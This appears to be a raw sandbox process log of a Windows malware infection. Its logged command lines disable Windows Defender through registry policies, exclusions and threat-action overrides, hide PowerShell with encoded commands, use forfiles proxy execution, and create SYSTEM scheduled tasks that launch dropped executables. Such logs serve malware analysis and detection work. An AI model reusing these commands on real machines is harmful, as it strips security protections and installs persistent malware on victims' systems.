forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe\" PP /NvFdidEBmy 385121 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn btZaCbGShXZoJDfvCg

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Windows\system32\taskeng.exe

taskeng.exe {6CFBFD9D-0CBB-4AF8-BC87-646F11C8566F} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe

C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\yMUNleu.exe PP /NvFdidEBmy 385121 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gHrmjaccM" /SC once /ST 00:36:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gHrmjaccM"

C:\Windows\system32\taskeng.exe

taskeng.exe {3F9049A4-E151-4328-955F-2EFE76B778DB} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gHrmjaccM"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gxkbdyaVa" /SC once /ST 00:20:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gxkbdyaVa"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gxkbdyaVa"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\QqEAMUespgTHJnVz\GQDRcsXT\PMxFzlNWEeKxTYtk.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\QqEAMUespgTHJnVz\GQDRcsXT\PMxFzlNWEeKxTYtk.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "geIHXerhR" /SC once /ST 00:21:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "geIHXerhR"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "geIHXerhR"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 00:45:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe\" 0c /bIFgdidNa 385121 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 600

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe 0c /bIFgdidNa 385121 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

